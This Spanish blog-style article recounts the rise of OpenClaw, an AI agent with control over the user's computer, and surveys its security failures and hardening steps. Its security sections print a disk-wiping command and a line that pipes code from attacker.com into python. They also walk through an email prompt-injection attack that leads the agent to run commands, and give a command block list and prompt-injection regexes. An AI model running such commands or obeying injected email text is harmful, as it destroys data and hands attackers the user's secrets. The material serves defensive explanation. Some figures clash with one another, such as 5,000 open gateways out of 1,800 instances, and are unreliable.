OpenClaw: La historia del Asistente Inteligente que controla tu computadora y los riesgos que eso implica
A finales de 2025, un programador austriaco retirado llamado Peter Steinberger estaba trabajando en un proyecto que debería haber permanecido como una curiosidad técnica en su portátil. Había salido del mundo de la tecnología hace tres años después de vender su empresa, PSPDFKit, a Insight Partners, una firma de inversión privada. La empresa que construyó procesaba PDF en más de mil millones de dispositivos. Ahora, tras años fuera del foco mediático, Steinberger decidió regresar con una obsesión renovada: crear un asistente de IA que no solo respondiera preguntas, sino que realmente hiciera cosas.
Lo que sucedió a continuación es la historia de cómo una herramienta revolucionaria se convirtió simultáneamente en un fenómeno viral, una amenaza de seguridad documentada, un campo de batalla para estafadores de criptomonedas, y un espejo que refleja los problemas fundamentales de cómo la industria de la IA está desplegando capacidades autónomas sin suficientes salvaguardas. Esta es la historia de OpenClaw.
Parte I: Los Orígenes - Cuando Peter Steinberger decidió construir un empleado digital
El viaje de Peter Steinberger
Peter Steinberger no es un nombre conocido fuera de los círculos de desarrollo de software, pero su legado en la industria tecnológica es significativo. Fundó PSPDFKit, una herramienta de desarrollo que se convirtió en el estándar para manipular archivos PDF en dispositivos móviles y de escritorio. Después de vender la empresa y tomar tiempo fuera de la tecnología, Steinberger observaba desde la distancia cómo la industria experimentaba su mayor transformación en décadas: la llegada de los modelos de lenguaje grande (LLM).
A diferencia de ChatGPT o Claude, que son herramientas conversacionales—excelentes para responder preguntas pero limitadas en acciones—Steinberger imaginó algo diferente. ¿Qué pasaría si un asistente de IA no solo respondiera tus preguntas, sino que pudiera realmente hacer el trabajo? ¿Manejar tu correo electrónico, programar reuniones, ejecutar tareas en tu computadora, interactuar con tus aplicaciones?[1]
La visión original: Un empleado sin salario
En noviembre de 2025, Steinberger lanzó su proyecto. Lo llamó "ClawdBot" como un juego de palabras entre "Claude" (el modelo de IA de Anthropic que impulsaría el proyecto) y "claw" (garra). Eligió un camarón de agua profunda como mascota—una criatura roja brillante y extraña que rápidamente los desarrolladores apodaron el "camarón del espacio".[2]
El concepto era simple pero revolucionario: OpenClaw se instalaría directamente en la computadora del usuario y accedería a recursos críticos del sistema. Podría ejecutar comandos de shell, leer y escribir archivos, controlar navegadores web, acceder a correo electrónico y calendarios, e interactuar con aplicaciones de mensajería como WhatsApp, Telegram, Discord, Slack, Signal e iMessage. El usuario comunicaría sus deseos a través de cualquiera de estas plataformas usando lenguaje natural, y el agente interpretaría esos deseos, tomaría decisiones autónomas sobre qué herramientas invocar y qué datos acceder, y ejecutaría acciones sin esperar confirmación humana por cada paso.[1][2]
No era un chatbot. Era algo radicalmente diferente: un asistente autónomo con acceso a tu vida digital completa.
Parte II: El fenómeno viral - de proyecto de fin de semana a terremoto de Internet
La Explosión de enero de 2026
Lo que sucedió a continuación fue prácticamente sin precedentes en la historia de GitHub. A principios de enero de 2026, las primeras demostraciones comenzaron a circular en redes sociales. Un usuario utilizó ClawdBot para contactar a concesionarios de automóviles y negociar el precio de un vehículo de forma completamente autónoma. Otro lo usó para transcribir más de mil notas de voz de WhatsApp y crear una base de datos consultable. Algunos lo utilizaron para crear sitios web completos a partir de comandos enviados por Telegram.
Un periodista tecnológico influyente, Federico Viticci de MacStories, publicó una revisión extensiva describiendo a ClawdBot como "la experiencia más divertida y productiva que he tenido con IA personal en mucho tiempo".[3]
Esa revisión fue el punto de inflexión. En cuestión de días, GitHub mostró un fenómeno extraordinario: ClawdBot superó 100,000 estrellas. Para contexto, esto es más rápido que la mayoría de herramientas de IA convencionales. Su sitio web recibió dos millones de visitantes en una sola semana. Cloudflare reportó que su stock subió aproximadamente 20% después de anunciar "Moltworker", una forma de ejecutar el agente en su infraestructura en la nube por solo cinco dólares al mes.[1]
La Crisis de Identidad: Trademark, Estafadores y Rebrandings
Entonces comenzaron los problemas.
El 15 de enero de 2026, Anthropic envió una carta legal. El nombre "ClawdBot" era demasiado similar a su marca registrada "Claude". Steinberger tuvo que cambiar de nombre inmediatamente. En un brainstorm caótico a las 5 de la mañana en Discord con la comunidad, el equipo eligió "Moltbot"—una referencia a la muda de caparazón de los crustáceos, simbolizando el crecimiento.[2]
Pero aquí es donde la historia se vuelve perturbadora. Cuando Steinberger intentó cambiar simultáneamente la organización de GitHub y las cuentas de X/Twitter, estafadores de criptomonedas saquearon ambas en cuestión de segundos. El intervalo entre liberar los nombres antiguos y reclamar los nuevos fue suficiente. Las cuentas secuestradas comenzaron inmediatamente a bombear un token falso llamado "CLAWD" en Solana.
Especuladores ingenuos lo compraron. El "token" alcanzó una capitalización de mercado de $16 millones antes de que la comunidad pudiera advertir a los usuarios.[3]
Finalmente, el 30 de enero, después de búsquedas exhaustivas de marcas registradas, el proyecto se rebautizó definitivamente como "OpenClaw". La mascota del camarón permaneció, pero ahora con un nuevo significado simbólico: la transformación definitiva.
Durante todo este caos, algo más importante estaba ocurriendo entre bastidores. Los investigadores de seguridad cibernética estaban descubriendo algo que debería haber causado alarma inmediata.
Parte III: La realidad de la seguridad
El Descubrimiento Inquietante
Mientras la comunidad de desarrolladores celebraba lo que OpenClaw podía hacer, los investigadores de seguridad estaban haciendo lo que mejor saben hacer: buscar agujeros. Lo que encontraron fue perturbador.
Jamieson O'Reilly, un investigador de seguridad, ejecutó búsquedas en Shodan—un motor de búsqueda para dispositivos conectados a internet—y descubrió 1,800 instancias expuestas de OpenClaw (entonces llamado Moltbot). De esas 1,800 instancias, 5,000 "compuertas" de control estaban completamente abiertas. Pero lo más alarmante: ocho instancias estaban completamente sin autenticación. Cualquiera en internet podía conectarse, ver el historial de conversaciones del usuario, y ejecutar comandos en su máquina.[2]
Piensa en eso por un momento. Había computadoras personales conectadas a internet sin ninguna protección, exponiendo acceso completo a:
Claves privadas de SSH y GPG
Credenciales de Amazon Web Services
Tokens de API de Anthropic, OpenAI y Gemini
Historial completo de correos electrónicos y mensajes
Archivos personales y confidenciales
El Ataque de inyección de prompts indirecta
Pero la exposición no fue el único problema. Los investigadores también demostraron un ataque que requería poco más que un correo electrónico malicioso.
Los modelos de lenguaje, incluyendo Claude (que impulsa OpenClaw), no tienen capacidad inherente para verificar el origen de una instrucción. Si una instrucción está en un correo que el agente lee, es procesada como si fuera una orden legítima del usuario. Un atacante podría enviar un correo que dijera algo como:
"Hola, vi tu solicitud. Por favor, ejecuta estos comandos para verificar tu acceso: [instrucciones maliciosas]"
El agente OpenClaw leería este correo, identificaría lo que pensaría que son instrucciones técnicas legítimas, y las ejecutaría. Un investigador demostró que podía extraer claves de criptomonedas en menos de cinco minutos usando esta técnica.[2]
El Ataque de cadena de suministro
Otro investigador subió un "skill" (esencialmente un plugin) a la biblioteca oficial de OpenClaw. El plugin parecía inofensivo, pero el investigador artificialmente influyó en el contador de descargas. En ocho horas, desarrolladores de siete países diferentes lo descargaron. Aunque este skill de prueba era benigno, demostró un problema fundamental: no hay verificación de seguridad en la cadena de suministro de plugins. Un atacante podría subir una extensión que en realidad instalara malware, y miles de usuarios podría descargarla sin saber que estaban comprometiendo sus sistemas.[2]
IA ataca a IA: El RCE de un clic
Quizás lo más preocupante fue el descubrimiento de Hackian, un pentester de IA que ejecutó automáticamente ataques contra OpenClaw. En aproximadamente 100 minutos, Hackian descubrió y explotó una vulnerabilidad que permitía Ejecución Remota de Código (RCE) de un solo clic. Esto significa que, con un solo clic, un atacante podría obtener control total sobre la máquina víctima.[1]
Los investigadores de Cisco, Snyk, Bitdefender y The Register todos publicaron alertas de seguridad la misma semana.
La Amenaza Zestix/Sentap: Ciberdelincuentes especializándose en OpenClaw
Entonces sucedió algo que confirmaría que estos riesgos teóricos se habían convertido en operacionales.
Grupos de ciberdelincuentes activamente comenzaron a adaptar sus herramientas de "infostealer" (malware que roba información) para buscar específicamente archivos de configuración de OpenClaw. Hudson Rock, una firma de investigación de ciberamenazas, documentó que el grupo Zestix/Sentap—brokers de acceso inicial que operan desde foros de habla rusa—estaban activamente buscando instancias de OpenClaw con credenciales sin protección. Habían vendido acceso a más de 50 corporaciones globales.[2]
Lo que estaba sucediendo era una cadena clara de compromisos:
Malware infostealer se distribuía ampliamente para cosechar credenciales de dispositivos personales
El mismo malware se actualizó para buscar archivos .env de OpenClaw (donde se almacenan todos los secretos)
Ciberdelincuentes vendían estos secretos en foros oscuros
Compradores de acceso infiltraban sistemas corporativos usando estas credenciales "heredadas"
Datos de miles de millones de registros empresariales terminaban en venta en el mercado negro
Algunos de los compromisos documentados incluyen acceso a Google AdSense, Cisco, FedEx, Home Depot, Disney/Hulu, McDonald's, Chanel y Louis Vuitton. En un caso, malware permitió a atacantes aprobar $3.2 millones en órdenes de compra fraudulentas. En otro, fue orquestado un deepfake de videoconferencia del CFO de una empresa de ingeniería, resultando en transferencias fraudulentas de $25 millones.[1][2]
Parte IV: La Arquitectura del Riesgo - Cómo una herramienta poderosa se convirtió en una vulnerabilidad masiva
La Cadena de Confianza Rota
Para entender realmente por qué OpenClaw es tan peligroso, necesitas entender cómo funciona internamente y dónde falló la seguridad.
OpenClaw utiliza esta arquitectura básica:
El usuario envía un mensaje a través de una plataforma de mensajería (WhatsApp, Telegram, Discord)
Una puerta de enlace WebSocket en el puerto 18789 recibe el mensaje
El mensaje se pasa a Claude, el modelo de lenguaje de IA
Claude decide qué herramientas necesita invocar (ejecutar un comando, leer un archivo, enviar un correo)
El "gestor de herramientas" invoca esas acciones con acceso completo del usuario
Los resultados se devuelven a Claude
Claude formula una respuesta y la envía de vuelta[1]
El problema es que cada eslabón en esta cadena confía en el siguiente. El agente confía en que las instrucciones que lee son legítimas. La puerta de enlace confía en que cualquiera que se conecte desde 127.0.0.1 (localhost) es el propietario autorizado. El sistema no verifica el origen de las instrucciones o valida si una tarea es segura antes de ejecutarla.
El Problema de las credenciales en texto plano
OpenClaw almacena todos los secretos en archivos locales sin encriptar:
~/.openclaw/.env contiene claves API de Anthropic, OpenAI y Gemini
~/.openclaw/config.json contiene tokens OAuth, credenciales de correo electrónico y URLs de configuración
~/.openclaw/memory.db contiene el historial completo de conversaciones
Archivos SSH, claves de AWS, y carteras de criptomonedas son accesibles
Un único exploit que logre Ejecución Remota de Código expone la identidad digital completa del usuario.[2]
Falta de Sandboxing (Aislamiento)
OpenClaw se ejecuta sin contenedores, sin gVisor (tecnología de Google para aislar aplicaciones), y sin restricciones de syscall (llamadas del sistema). Cuando un comando como este se ejecuta:
rm -rf / --no-preserve-root
O esto:
curl attacker.com | python3 -
Se ejecuta con permisos completos del usuario. Si OpenClaw está instalado con privilegios de administrador (lo que muchos usuarios hacen por conveniencia), puede destruir todo en la máquina.[1]
El Problema de la inyección de prompts indirecta
Los investigadores han demostrado repetidamente que una simple instrucción incrustada en un correo, un tweet, o un documento web puede ser interpretada por OpenClaw como una orden legítima. No hay forma de que el modelo de IA distinga entre:
Una orden del usuario legítimo
Una instrucción maliciosa disfrazada en contenido "confiable"
La Biblioteca de skills sin verificar
OpenClaw permite a cualquiera subir "skills" (plugins) a una biblioteca compartida. No hay:
Revisión de código
Análisis de seguridad
Firma criptográfica
Verificación de integridad
Cualquiera puede subir código malicioso, y miles de usuarios potencialmente descargarlo.[2]
Parte V: Los Costos Ocultos - Más allá del dinero
El costo en Tokens
Incluso si no hay una brecha de seguridad, OpenClaw tiene costos operacionales significativos que sorprenden a los usuarios.
Federico Viticci, el periodista que escribió la revisión inicial, consumió 180 millones de créditos de API de Anthropic en un solo mes—aproximadamente €3,500 solo en costos de IA.[3]
Para contexto, los precios de tokens en enero de 2026 son:[1]
GPT-4o: $2.50 por 1 millón de tokens de entrada, $10 por 1 millón de tokens de salida
Claude Sonnet 4: $3.00 por 1 millón de tokens de entrada, $15 por 1 millón de tokens de salida
Agentes complejos: Consumen 5-20 veces más tokens por tarea que simples consultas
Lo que muchos usuarios no anticipan es que el overhead de la plataforma (infraestructura, almacenamiento, orquestación) es frecuentemente 27 veces más costoso que el costo de los tokens mismos. Un agente que consume €13,000 en tokens por año puede costar €334,000 en infraestructura.[1]
El Costo en seguridad
Si tu instalación de OpenClaw se ve comprometida, los costos de remediación incluyen:
Respuesta a incidentes: €50,000 - €500,000
Reimagenar máquinas: €10,000 - €100,000 por computadora
Análisis forense digital: €30,000 - €150,000
Rotación de credenciales: Miles de euros en horas de ingeniería
Un solo incidente puede costar más que cinco años de ahorros que hayas ganado mediante automatización.[1][2]
El costo legal y regulatorio
Aquí es donde la historia se vuelve cara para las organizaciones.
GDPR (Unión Europea): Si OpenClaw procesa datos personales de residentes de la UE, y hay una brecha, las multas van hasta €20 millones o 4% de los ingresos globales anuales, lo que sea más alto. Además, tienes que notificar a individuos afectados dentro de 72 horas.
EU AI Act (Entra en vigor agosto de 2026): Los sistemas clasificados como "alto riesgo" (toma de decisiones autónoma aplicable a todos) requieren:
Documentación exhaustiva
Evaluaciones de impacto
Auditorías de seguridad
Logging completo
Las violaciones resultan en multas de €35 millones o 7% de los ingresos anuales globales. OpenClaw, sin documentación adecuada, es una violación por defecto.[2]
SOC 2, HIPAA, CCPA: Cualquier organización certificada en estos estándares está legalmente obligada a demostrar control sobre agentes de IA. Shadow IT (uso no autorizado de software empresarial) = incumplimiento demostrable.
Parte VI: Las personas en mayor riesgo
Usuarios NO Técnicos
Los usuarios sin experiencia técnica son los más vulnerables. No saben cómo:
Configurar autenticación fuerte
Implementar firewalls
Gestionar secretos de forma segura
Reconocer ataques de inyección de prompts
Simplemente instalan OpenClaw con la configuración por defecto (que es insegura) y lo dejan funcionando en su máquina primaria.[2]
Empleados trabajando en Shadow IT
El 22% de clientes empresariales tienen empleados activamente usando OpenClaw sin aprobación de IT. Estos empleados están conectando:
Correo corporativo
Calendarios de trabajo
Acceso a repositorios de código
Información de clientes
A un sistema que nadie está monitoreando.[1][2]
Pequeñas y Medianas Empresas (PyMES o SMEs)
Tienen presupuesto limitado de seguridad, personal de IT reducido, y a menudo presión de velocidad que supera a las consideraciones de seguridad. Son exactamente el tipo de organizaciones que está adoptando OpenClaw sin los controles apropiados.[1]
Sectores críticos
Las industrias más vulnerables incluyen:
Finanzas: Acceso a sistemas de transacción, PII de clientes
Gobierno: Datos clasificados, información de ciudadanos
Aviación: Sistemas de seguridad, datos de pasajeros
Salud: Registros médicos, información de pacientes (violaciones HIPAA graves)
Tecnología: Código fuente, infraestructura en la nube
Retail de Lujo: Datos de clientes VIP, información de tarjetas de crédito
Parte VII: Cómo protegerse
Si decides usar OpenClaw:
La documentación oficial de OpenClaw establece explícitamente: "No hay una configuración absolutamente segura". Si, a pesar de todo, decides usarlo, estos son los controles mínimos:[1][2]
1. Nunca en tu máquina principal
Usa una máquina virtual dedicada, una máquina secundaria antigua, o un contenedor aislado. Esto es no negociable.
2. Autenticación fuerte obligatoria
OPENCLAW_GATEWAY_AUTH=true
OPENCLAW_GATEWAY_TLS=true
OPENCLAW_GATEWAY_TOKEN_EXPIRY=3600 # Expiración cada 1 hora
3. Encriptar todos los secretos
No almacenes claves API en archivos .env en texto plano. Usa un gestor de secretos:
HashiCorp Vault
AWS Secrets Manager
Azure Key Vault
Inyecta los secretos en tiempo de ejecución desde estos sistemas.
4. Restricciones de comandos
Bloquea comandos peligrosos:
OPENCLAW_BLOCKED_COMMANDS="rm -rf|dd|:(){:|:&|mkfs|fdisk|mkswap"
5. Verificación de Skills obligatoria
OPENCLAW_SKILL_VERIFICATION=true
OPENCLAW_SKILL_SIGNING_REQUIRED=true
No permitas instalación de plugins sin revisión manual.
6. Aislamiento de red
Firewall estricto: bloquea todo excepto endpoints autorizados específicos
VPN obligatoria
Nunca expuesto públicamente a internet
7. Monitoreo y Alertas
Configura alertas para:
Número anormal de llamadas de API
Acceso a archivos fuera de directorios permitidos
Transferencia de datos inesperada
Para Organizaciones: Estrategia de Gobernanza
1. Inventario Inmediato
Busca todas las instancias de OpenClaw en tu red
Busca Shadow IT (herramientas de IA no autorizadas)
Documenta dónde están y quién las está usando
2. Clasificación de Riesgos
Usa el marco NIST AI RMF:
¿Qué datos accede el agente?
¿Qué decisiones puede tomar?
¿Cuál es el daño potencial si se ve comprometido?
3. Proporcionar Una Alternativa Autorizada
Si los empleados necesitan IA, dales acceso a una versión segura:
OpenClaw sandboxed en contenedores gVisor
LLM privado alojado internamente
Integración controlada con sistemas corporativos
4. Educación de Empleados
Enseña a los empleados sobre:
Riesgos de inyección de prompts
Shadow IT y por qué es peligroso
Cómo reportar herramientas sospechosas
5. Cloud Access Security Broker (CASB)
Implementa herramientas como:
Cloudflare
Zscaler
Netskope
Para detectar y bloquear tráfico hacia servicios de IA no autorizados.
Para Desarrolladores: Si debes integrar OpenClaw
1. Sandboxing Estricto
Usa contenedores gVisor o microVMs de Firecracker/Kata:
FROM google/gvisor:latest
RUN gvisor-runsc run \
--network-device eth0 \
--restrict-host-ips \
openclaw:latest
2. Least Privilege
Define exactamente qué puede hacer el agente:
AGENT_PERMISSIONS = {
"read_email": False,
"read_calendar": False,
"execute_shell": False,
"call_external_apis": ["github.com/my-org"],
"read_files": ["/home/user/projects"],
"write_files": ["/tmp/openclaw"]
}
3. Validación de Entrada
Detecta patrones de inyección de prompts:
PROMPT_INJECTION_PATTERNS = [
r"(?i)execute.*command",
r"(?i)ignore.*previous",
r"(?i)forget.*instructions",
]
4. Auditoría y Logging
Registra todo: qué acciones toma el agente, qué datos accede, cuándo fallan las validaciones.
Conclusión: El Futuro de los Agentes de IA Autónomos
La Lección de OpenClaw
OpenClaw no es el único agente de IA del mercado, pero su trayectoria—de proyecto de fin de semana a fenómeno viral a advertencia de seguridad en cuestión de semanas—refleja una verdad incómoda: la industria de IA está construyendo capacidades poderosas más rápido de lo que está resolviendo los problemas de seguridad que crean.
El modelo de Peter Steinberger fue correcto en su visión: los usuarios quieren asistentes que realmente hagan cosas, no solo chatbots que hablen. El éxito de OpenClaw prueba que existe demanda real.
Pero la ejecución reveló que los sistemas autónomos con acceso sin restricciones a recursos críticos requieren enfoque de seguridad completamente diferente del que la industria está proporcionando.[1][2]
Hacia Dónde Vamos
Para 2026 y más allá:
Más Herramientas Similares: OpenClaw no será la única. Múltiples competidores lanzarán agentes. Los que sobrevivan serán aquellos que resuelvan seguridad desde el diseño, no como pensamiento tardío.
Regulación Más Estricta: La EU AI Act entra en vigor agosto 2026. Las regulaciones se volverán más exigentes sobre auditoría, logging y transparencia de agentes autónomos.
Adopción Empresarial Acelerada: Pero las implementaciones estarán altamente controladas, sandboxed y auditadas. El futuro no es agentes libres y sin restricciones, sino agentes fuertemente gobernados.
Convergencia de Seguridad y IA: La búsqueda y la defensa convergerán. Veremos especialización: pentesting de IA, análisis de vulnerabilidades de IA, y marcos de seguridad específicos para agentes autónomos.
Mi Recomendación personal
Si eres un usuario individual, espera. Hay temas sin resolver en OpenClaw. Los principales investigadores de seguridad lo han documentado. Espera a que la maduración de seguridad ocurra.
Si eres una organización, ten cuidado con Shadow IT. Proporciona alternativas seguras. Entrena a tus empleados. Si debes usar agentes de IA, hazlo con control, auditoría y gobernanza rigurosa.
La visión de Peter Steinberger fue correcta. El futuro es agentes autónomos que realmente hacen cosas. Pero el camino hacia allí requiere seguridad seria, gobernanza real, y aceptación de que el poder sin guardrails no es innovación, es negligencia.
OpenClaw es una lección costosa que ahora sabemos mejor. La pregunta es si como industria, realmente la aprendemos.
Referencias citadas:
Solveita Insights. (2026, enero 29). "The AI Tool That Broke the Internet This Week". https://solveita.com/insights/openclaw-ai-agent-business-automation
ARA Cataluña. (2026, enero 29). "OpenClaw: the viral AI that controls your computer and opens a huge cybersecurity hole". https://en.ara.cat/media/openclaw-the-viral-ai-that-controls-your-computer-and-opens-huge-cybersecurity-hole_1_5633694.html
3. IBM Think. (2026, enero 28). "OpenClaw: The viral 'space lobster' agent testing the limits of vertical integration". https://www.ibm.com/think/news/clawdbot-ai-agent-testing-limits-vertical-integration
Comentarios
Publicar un comentario